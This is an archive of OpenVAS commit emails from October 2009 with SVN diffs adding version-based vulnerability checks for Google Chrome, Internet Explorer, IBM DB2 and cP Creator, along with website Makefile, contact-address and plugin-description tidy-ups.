+ + References: + http://secunia.com/advisories/36815 + http://www.milw0rm.com/exploits/9726 + + CVSS Score: + CVSS Base Score : 6.8 (AV:N/AC:M/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.1 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version cP Creator"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) Intevation GmbH"); + script_dependencies("gb_cpcreator_detect.nasl"); + script_family("Web application abuses"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +cpcreatPort = get_http_port(default:80); +if(!cpcreatPort){ + exit(0); +} + +cpcreatVer = get_kb_item("www/" + cpcreatPort + "/cPCreator"); +if(!cpcreatVer){ + exit(0); +} + +cpcreatVer = eregmatch(pattern:"^(.+) under (/.*)$", string:cpcreatVer); +if(cpcreatVer[1] != NULL) +{ + if(version_is_less_equal(version:cpcreatVer[1], test_version:"2.7.1")){ + security_hole(cpcreatPort); + } +} Added: trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl 2009-10-06 05:21:15 UTC (rev 5379) @@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_google_chrome_sec_bypass_vuln_oct09.nasl 5092 2009-10-05 21:33:26Z oct $ +# +# Google Chrome CA SSL Certificate Security Bypass Vulnerability - Oct09 +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801108); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3456"); + script_bugtraq_id(36479); + script_name("Google Chrome CA SSL Certificate Security Bypass Vulnerability - Oct09"); + desc = " + Overview: This host is installed with Google Chrome Web Browser and is prone + to Security Bypass vulnerability. + + Vulnerability Insight: + Google Chrome fails to properly validate '\0' character in the domain name + in a signed CA certificate, allowing attackers to substitute malicious SSL + certificates for trusted ones. + + Impact: + Successfully exploitation will let the attackers to perform man-in-the-middle + attacks or impersonate trusted servers, which will aid in further attack. + + Impact Level: Application + + Affected Software/OS: + Google Chrome version 3.0.193.21 and prior on Windows. + + Fix: + No solution or patch is available as on 05th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://www.google.com/chrome + + References: + http://en.securitylab.ru/nvd/386075.php + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.4 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of Google Chrome"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("gb_google_chrome_detect_win.nasl"); + script_require_keys("GoogleChrome/Win/Ver"); + exit(0); +} + + +include("version_func.inc"); + +chromeVer = get_kb_item("GoogleChrome/Win/Ver"); +if(isnull(chromeVer)){ + exit(0); +} + +# Check for Google Chrome Version <= 3.0.195.21 +if(version_is_less_equal(version:chromeVer, test_version:"3.0.195.21")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl 2009-10-06 05:21:15 UTC (rev 5379) @@ -0,0 +1,91 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ibm_db2_mult_vuln_lin_oct09.nasl 5093 2009-10-05 16:03:51Z oct $ +# +# IBM DB2 Multiple Vulnerabilities - Oct09 (Linux) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801001); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3471", "CVE-2009-3472"); + script_bugtraq_id(36540); + script_name("IBM DB2 Multiple Vulnerabilities - Oct09 (Linux)"); + + desc = " + Overview: The host is installed with IBM DB2 and is prone to multiple + vulnerabilities. + + Vulnerability Insight: + - An unspecified error exists related to a table function when the definer + loses required privileges. + - An unspecified error can be exploited to insert, update, or delete rows in + a table without having required privileges. + + Impact: Unknow impact. + + Impact Level: System/Application + + Affected Software/OS: + IBM DB2 version 8 prior to Fixpak 18 + IBM DB2 version 9.1 prior to Fixpak 8 + IBM DB2 version 9.5 prior to Fixpak 4 + + Fix:Update DB2 8 Fixpak 18 or 9.1 Fixpak 8 or 9.5 Fixpak 4 or later. + http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053 + + References: + http://secunia.com/advisories/36890 + http://www-01.ibm.com/support/docview.wss?uid=swg21403619 + http://www-01.ibm.com/support/docview.wss?uid=swg21386689 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 5.5 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of IBM DB2"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("secpod_ibm_db2_detect_linux_900217.nasl"); + script_require_keys("Linux/IBM-db2/Ver"); + exit(0); +} + + +include("version_func.inc"); + +ibmVer = get_kb_item("Linux/IBM-db2/Ver"); +if(!ibmVer){ + exit(0); +} + +# Check for IBM DB2 version 8 before FP18, 9.1 before FP8, 9.5 before FP4 +# 9.1 FP8 =>9.1.0.8, 9.5 FP4 =>9.5.0.4, 8 FP18 =>8.1.18 +if(version_in_range(version:ibmVer, test_version:"8.0", test_version2:"8.1.17")|| + version_in_range(version:ibmVer, test_version:"9.1", test_version2:"9.1.0.7")|| + version_in_range(version:ibmVer, test_version:"9.5", test_version2:"9.5.0.3")){ + security_hole(0); +} Added: trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl 2009-10-06 05:21:15 UTC (rev 5379) @@ -0,0 +1,91 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ibm_db2_mult_vuln_win_oct09.nasl 5093 2009-10-05 15:11:27Z oct $ +# +# IBM DB2 Multiple Vulnerabilities - Oct09 (Win) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801009); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3471", "CVE-2009-3472"); + script_bugtraq_id(36540); + script_name("IBM DB2 Multiple Vulnerabilities - Oct09 (Win)"); + + desc = " + Overview: The host is installed with IBM DB2 and is prone to multiple + vulnerabilities. + + Vulnerability Insight: + - An unspecified error exists related to a table function when the definer + loses required privileges. + - An unspecified error can be exploited to insert, update, or delete rows in + a table without having required privileges. + + Impact: Unknow impact. + + Impact Level: System/Application + + Affected Software/OS: + IBM DB2 version 8 prior to Fixpak 18 + IBM DB2 version 9.1 prior to Fixpak 8 + IBM DB2 version 9.5 prior to Fixpak 4 + + Fix:Update DB2 8 Fixpak 18 or 9.1 Fixpak 8 or 9.5 Fixpak 4 or later. + http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053 + + References: + http://secunia.com/advisories/36890 + http://www-01.ibm.com/support/docview.wss?uid=swg21403619 + http://www-01.ibm.com/support/docview.wss?uid=swg21386689 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 5.5 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of IBM DB2"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("secpod_ibm_db2_detect_win_900218.nasl"); + script_require_keys("Win/IBM-db2/Ver"); + exit(0); +} + + +include("version_func.inc"); + +ibmVer = get_kb_item("Win/IBM-db2/Ver"); +if(!ibmVer){ + exit(0); +} + +# Check for IBM DB2 version 8 before FP18, 9.1 before FP8, 9.5 before FP4 +# 9.1 FP8 => 9.1.800.1023, 9.5 FP4 => 9.5.400.576, 8 FP18 =>8.1.18 +if(version_in_range(version:ibmVer, test_version:"8.0", test_version2:"8.1.17")|| + version_in_range(version:ibmVer, test_version:"9.1", test_version2:"9.1.800.1022")|| + version_in_range(version:ibmVer, test_version:"9.5", test_version2:"9.5.400.575")){ + security_hole(0); +} Added: trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl 2009-10-06 05:21:15 UTC (rev 5379) @@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ibm_db2_unspesified_vuln_lin.nasl 5093 2009-10-05 18:11:27Z oct $ +# +# IBM DB2 Unspecified Vulnerability (Linux) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801003); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3473"); + script_name("IBM DB2 Unspecified Vulnerability (Linux)"); + desc = " + Overview: The host is installed with IBM DB2 and is prone to unspecified + vulnerability. + + Vulnerability Insight: + An unspecified error in the handling of 'SET SESSION AUTHORIZATION' + statements that can be exploited to execute the statement without having + the required privileges. + + Impact: Unknow impact. + + Impact Level: System/Application. + + Affected Software/OS: + IBM DB2 version 9.1 prior to Fixpak 8 + + Fix:Update DB2 9.1 Fixpak 8 or later. + http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053 + + References: + http://secunia.com/advisories/36890 + http://www-01.ibm.com/support/docview.wss?uid=swg21403619 + http://www-01.ibm.com/support/docview.wss?uid=swg21386689 + + CVSS Score: + CVSS Base Score : 10.0 (AV:N/AC:L/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 7.4 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of IBM DB2"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("secpod_ibm_db2_detect_linux_900217.nasl"); + script_require_keys("Linux/IBM-db2/Ver"); + exit(0); +} + + +include("version_func.inc"); + +ibmVer = get_kb_item("Linux/IBM-db2/Ver"); +if(!ibmVer){ + exit(0); +} + +# Check for IBM DB2 Products Version 9.1 before FP8 +# IBM DB2 9.1 FP8 =>9.1.0.8 +if(version_in_range(version:ibmVer, test_version:"9.1", + test_version2:"9.1.0.7")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl 2009-10-06 05:21:15 UTC (rev 5379) @@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ibm_db2_unspesified_vuln_win.nasl 5093 2009-10-05 17:11:27Z oct $ +# +# IBM DB2 Unspecified Vulnerability (Win) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801002); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3473"); + script_name("IBM DB2 Unspecified Vulnerability (Win)"); + desc = " + Overview: The host is installed with IBM DB2 and is prone to unspecified + vulnerability. + + Vulnerability Insight: + An unspecified error in the handling of 'SET SESSION AUTHORIZATION' + statements that can be exploited to execute the statement without having + the required privileges. + + Impact: Unknown impact. + + Impact Level: System/Application. + + Affected Software/OS: + IBM DB2 version 9.1 prior to Fixpak 8 + + Fix:Update DB2 9.1 Fixpak 8 or later. + http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053 + + References: + http://secunia.com/advisories/36890 + http://www-01.ibm.com/support/docview.wss?uid=swg21403619 + http://www-01.ibm.com/support/docview.wss?uid=swg21386689 + + CVSS Score: + CVSS Base Score : 10.0 (AV:N/AC:L/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 7.4 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of IBM DB2"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("secpod_ibm_db2_detect_win_900218.nasl"); + script_require_keys("Win/IBM-db2/Ver"); + exit(0); +} + + +include("version_func.inc"); + +ibmVer = get_kb_item("Win/IBM-db2/Ver"); +if(!ibmVer){ + exit(0); +} + +# Check for IBM DB2 Products Version 9.1 before FP8 +# IBM DB2 9.1 FP8 => 9.1.800.1023 +if(version_in_range(version:ibmVer, test_version:"9.1", + test_version2:"9.1.800.1022")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl 2009-10-06 05:21:15 UTC (rev 5379) @@ -0,0 +1,87 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl 5091 2009-10-05 21:51:26Z oct $ +# +# Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09 +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801109); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3454"); + script_bugtraq_id(36475); + script_name("Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09"); + desc = " + Overview: This host is installed with Internet Explorer and is prone to + Security Bypass vulnerability. + + Vulnerability Insight: + Microsoft Internet Explorer fails to properly validate '\0' character in the + domain name in a signed CA certificate, allowing attackers to substitute + malicious SSL certificates for trusted ones. + + Impact: + Successful exploitation will let the attackers to perform man-in-the-middle + attacks or impersonate trusted servers, which will aid in further attack. + + Impact Level: Application + + Affected Software/OS: + Microsoft IE version 6.x/7.x/8.x + + Fix: No solution or patch is available as on 05th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://www.google.com/chrome + + References: + http://www.wired.com/threatlevel/2009/07/kaminsky/ + http://www.networkworld.com/news/2009/073009-more-holes-found-in-webs.html + http://www.networkworld.com/news/2009/091709-microsoft-ie-security-hole.html + + CVSS Score: + CVSS Base Score : 6.8 (AV:N/AC:M/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 5.8 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of Google Chrome"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("gb_ms_ie_detect.nasl"); + script_require_keys("MS/IE/Version"); + exit(0); +} + + +include("version_func.inc"); + +ieVer = get_kb_item("MS/IE/Version"); +if(isnull(ieVer)){ + exit(0); +} + +# Check for IE version 6.x or 7.x or 8.x +if(ieVer =~ "^(6|7|8)\..*"){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl ___________________________________________________________________ Name: svn:executable + * From scm-commit at wald.intevation.org Tue Oct 6 07:45:14 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:45:14 +0200 (CEST) Subject: [Openvas-commits] r5380 - trunk/doc/website Message-ID: <20091006054514.C60DE852B84E@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 07:45:14 +0200 (Tue, 06 Oct 2009) New Revision: 5380 Modified: trunk/doc/website/Makefile Log: Force protocol version 29 Modified: trunk/doc/website/Makefile =================================================================== --- trunk/doc/website/Makefile 2009-10-06 05:21:15 UTC (rev 5379) +++ trunk/doc/website/Makefile 2009-10-06 05:45:14 UTC (rev 5380) @@ -54,7 +54,7 @@ online: all echo "Going to put current contents online for openvas.wald.intevation.org ..." - rsync -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ + rsync --proto=29 -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ $(USER)@wald.intevation.org:/openvas/htdocs/ install: all From scm-commit at wald.intevation.org Tue Oct 6 07:48:03 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:48:03 +0200 (CEST) Subject: [Openvas-commits] r5381 - trunk/doc/website Message-ID: <20091006054803.87B4F852B84F@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 07:48:03 +0200 (Tue, 06 Oct 2009) New Revision: 5381 Modified: trunk/doc/website/Makefile Log: Fix typo Modified: trunk/doc/website/Makefile =================================================================== --- trunk/doc/website/Makefile 2009-10-06 05:45:14 UTC (rev 5380) +++ trunk/doc/website/Makefile 2009-10-06 05:48:03 UTC (rev 5381) @@ -54,7 +54,7 @@ online: all echo "Going to put current contents online for openvas.wald.intevation.org ..." - rsync --proto=29 -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ + rsync --protocol=29 -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ $(USER)@wald.intevation.org:/openvas/htdocs/ install: all From scm-commit at wald.intevation.org Tue Oct 6 07:48:42 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:48:42 +0200 (CEST) Subject: [Openvas-commits] r5382 - trunk/doc/website Message-ID: <20091006054842.A1E93852B84F@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 07:48:42 +0200 (Tue, 06 Oct 2009) New Revision: 5382 Modified: trunk/doc/website/constitution.htm4 trunk/doc/website/openvas-contest-2008.htm4 trunk/doc/website/openvas-contest.htm4 trunk/doc/website/openvas.css trunk/doc/website/template_header.m4 Log: Fix up contact email address Modified: trunk/doc/website/constitution.htm4 =================================================================== --- trunk/doc/website/constitution.htm4 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/constitution.htm4 2009-10-06 05:48:42 UTC (rev 5382) @@ -6,7 +6,7 @@ m4_dnl Description: Constitution for OpenVAS project m4_dnl m4_dnl Authors: -m4_dnl Tim Brown +m4_dnl Tim Brown m4_dnl m4_dnl Copyright: m4_dnl Copyright (C) 2007 Tim Brown @@ -39,7 +39,7 @@

Project contacts

Modified: trunk/doc/website/openvas-contest-2008.htm4 =================================================================== --- trunk/doc/website/openvas-contest-2008.htm4 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/openvas-contest-2008.htm4 2009-10-06 05:48:42 UTC (rev 5382) @@ -7,7 +7,7 @@ m4_dnl m4_dnl Authors: m4_dnl Michael Wiegand -m4_dnl Tim Brown +m4_dnl Tim Brown m4_dnl m4_dnl Copyright: m4_dnl Copyright (C) 2008 Intevation GmbH @@ -73,7 +73,7 @@

Modified: trunk/doc/website/openvas-contest.htm4 =================================================================== --- trunk/doc/website/openvas-contest.htm4 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/openvas-contest.htm4 2009-10-06 05:48:42 UTC (rev 5382) @@ -85,7 +85,7 @@

Modified: trunk/doc/website/openvas.css =================================================================== --- trunk/doc/website/openvas.css 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/openvas.css 2009-10-06 05:48:42 UTC (rev 5382) @@ -4,7 +4,7 @@ * * Authors: * Jan-Oliver Wagner - * Tim Brown + * Tim Brown * * Copyright: * Copyright (C) 2007 Intevation GmbH Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2009-10-06 05:48:03 UTC (rev 5381) +++ trunk/doc/website/template_header.m4 2009-10-06 05:48:42 UTC (rev 5382) @@ -8,7 +8,7 @@ m4_dnl m4_dnl Authors: m4_dnl Jan-Oliver Wagner -m4_dnl Tim Brown +m4_dnl Tim Brown m4_dnl m4_dnl Copyright: m4_dnl Copyright (C) 2007 Intevation GmbH From scm-commit at wald.intevation.org Tue Oct 6 07:51:07 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:51:07 +0200 (CEST) Subject: [Openvas-commits] r5383 - trunk/openvas-compendium Message-ID: <20091006055107.7AED2852B84F@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 07:51:06 +0200 (Tue, 06 Oct 2009) New Revision: 5383 Modified: trunk/openvas-compendium/ChangeLog trunk/openvas-compendium/openvas-compendium.tex Log: Fix up contact email address Modified: trunk/openvas-compendium/ChangeLog =================================================================== --- trunk/openvas-compendium/ChangeLog 2009-10-06 05:48:42 UTC (rev 5382) +++ trunk/openvas-compendium/ChangeLog 2009-10-06 05:51:06 UTC (rev 5383) @@ -160,7 +160,7 @@ translation, updated information regarding port usage by older and more recent versions of OpenVAS. -2009-01-04 Tim Brown +2009-01-04 Tim Brown * openvas-compendium.de.tex, openvas-compendium.tex: Updated to reflect IANA's port assignment. @@ -382,7 +382,7 @@ * openvas-compendium.de.tex: Minor spelling fixes in the OTP chapter. -2008-10-16 Tim Brown +2008-10-16 Tim Brown * openvas-compendium.tex: Updated with details of knowledge base items in use for Solaris Local Security Checks and @@ -560,7 +560,7 @@ * openvas-compendium.tex: Adapted OTP documentation from specification. -2008-09-10 Tim Brown +2008-09-10 Tim Brown * openvas-compendium.tex: Added details about automatically updating. Modified: trunk/openvas-compendium/openvas-compendium.tex =================================================================== --- trunk/openvas-compendium/openvas-compendium.tex 2009-10-06 05:48:42 UTC (rev 5382) +++ trunk/openvas-compendium/openvas-compendium.tex 2009-10-06 05:51:06 UTC (rev 5383) @@ -6,7 +6,7 @@ % Authors: % Jan-Oliver Wagner % Michael Wiegand -% Tim Brown +% Tim Brown % % Copyright: % Copyright (C) 2008, 2009 Intevation GmbH From scm-commit at wald.intevation.org Tue Oct 6 08:02:08 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 08:02:08 +0200 (CEST) Subject: [Openvas-commits] r5384 - trunk/openvas-plugins/scripts Message-ID: <20091006060208.4FD08861EAB2@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 08:02:06 +0200 (Tue, 06 Oct 2009) New Revision: 5384 Modified: trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl trunk/openvas-plugins/scripts/ike-scan.nasl Log: Tidied up plugins Modified: trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl =================================================================== --- trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl 2009-10-06 05:51:06 UTC (rev 5383) +++ trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl 2009-10-06 06:02:06 UTC (rev 5384) @@ -26,7 +26,13 @@ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. # -desc = "Checkpoint VPN-1 PAT information disclosure +if (description) +{ + script_id(80096); + script_cve_id("CVE-2008-5849"); + name = "Checkpoint VPN-1 PAT information disclosure"; + script_name(name); + desc = "Checkpoint VPN-1 PAT information disclosure By sending crafted packets to ports on the firewall which are mapped by port address translation (PAT) to ports on internal devices, information about the internal network may be disclosed in the resulting ICMP error packets. Port 18264/tcp on the firewall is typically configured in such a manner, with packets to this port being rewritten to reach the firewall management server. For example, the firewall fails to correctly sanitise the encapsulated IP headers in ICMP time-to-live exceeded packets resulting in internal IP addresses being disclosed. @@ -49,13 +55,6 @@ where this vulnerability is reported. Risk factor: Low"; - -if (description) -{ - script_id(80096); - script_cve_id("CVE-2008-5849"); - name = "Checkpoint VPN-1 PAT information disclosure"; - script_name(name); script_description(desc); summary = "Determines whether Checkpoint VPN-1 is disclosing information about the internal network via PAT"; script_summary(summary); Modified: trunk/openvas-plugins/scripts/ike-scan.nasl =================================================================== --- trunk/openvas-plugins/scripts/ike-scan.nasl 2009-10-06 05:51:06 UTC (rev 5383) +++ trunk/openvas-plugins/scripts/ike-scan.nasl 2009-10-06 06:02:06 UTC (rev 5384) @@ -49,9 +49,9 @@ script_name(name); desc = "ike-scan (NASL wrapper) - This plugin runs ike-scan to identify IPSEC VPN endpoints. It will attempt to enumerate supported cipher suites, bruteforce valid groupnames and fingerprint any endpoint identified. +This plugin runs ike-scan to identify IPSEC VPN endpoints. It will attempt to enumerate supported cipher suites, bruteforce valid groupnames and fingerprint any endpoint identified. - See the section 'plugins options' to configure it"; +See the section 'plugins options' to configure it"; script_description(desc); summary = "Identifies IPSEC VPN endpoints"; script_summary(summary); From scm-commit at wald.intevation.org Tue Oct 6 08:12:51 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 08:12:51 +0200 (CEST) Subject: [Openvas-commits] r5385 - in trunk/openvas-plugins: . scripts Message-ID: <20091006061251.7C290861EAC3@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 08:12:48 +0200 (Tue, 06 Oct 2009) New Revision: 5385 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl trunk/openvas-plugins/scripts/dns_xfer.nasl trunk/openvas-plugins/scripts/gather-package-list.nasl trunk/openvas-plugins/scripts/ike-scan.nasl trunk/openvas-plugins/scripts/msdns-server-hostname-disclosure.nasl trunk/openvas-plugins/scripts/visionsoft-audit-detect.nasl Log: Fix up contact email address Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 06:02:06 UTC (rev 